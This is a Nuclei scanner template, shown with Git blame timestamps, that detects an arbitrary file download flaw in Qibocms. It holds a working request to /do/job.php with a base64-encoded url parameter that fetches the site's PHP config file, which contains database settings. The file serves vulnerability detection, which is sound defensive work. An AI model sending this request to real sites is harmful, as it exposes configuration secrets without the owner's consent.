nuclei-templates/http/vulnerabilities/qibocms-file-download.yaml

35 lines
865 B
YAML
Raw Permalink Normal View History

2022-12-12 15:36:09 +00:00
id: qibocms-file-download
info:
name: Qibocms - Arbitrary File Download
2022-12-12 15:36:09 +00:00
author: theabhinavgaur
severity: high
2024-01-15 11:44:47 +00:00
description: Qibocms is vulnerable to arbitrary file download vulnerability.
2022-12-12 17:18:05 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2022-12-16 17:48:35 +00:00
tags: qibocms,lfr
2022-12-12 15:36:09 +00:00
http:
2022-12-12 15:36:09 +00:00
- method: GET
path:
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
2022-12-12 17:12:18 +00:00
- "$webdb"
2022-12-12 15:36:09 +00:00
condition: and
2022-12-12 17:10:15 +00:00
- type: word
part: header
words:
- "filename=config"
2022-12-12 15:36:09 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100a7efeb910c29dd65e99bdc9f2faa45679f8f83ec8f5e1d29c4c1d978da137fb4022100ab1aa6476f780c0077965ff3119b56d2bd1e5d039434d1f348edef39e1e21d84:922c64590222798bb761d5b6d8e72950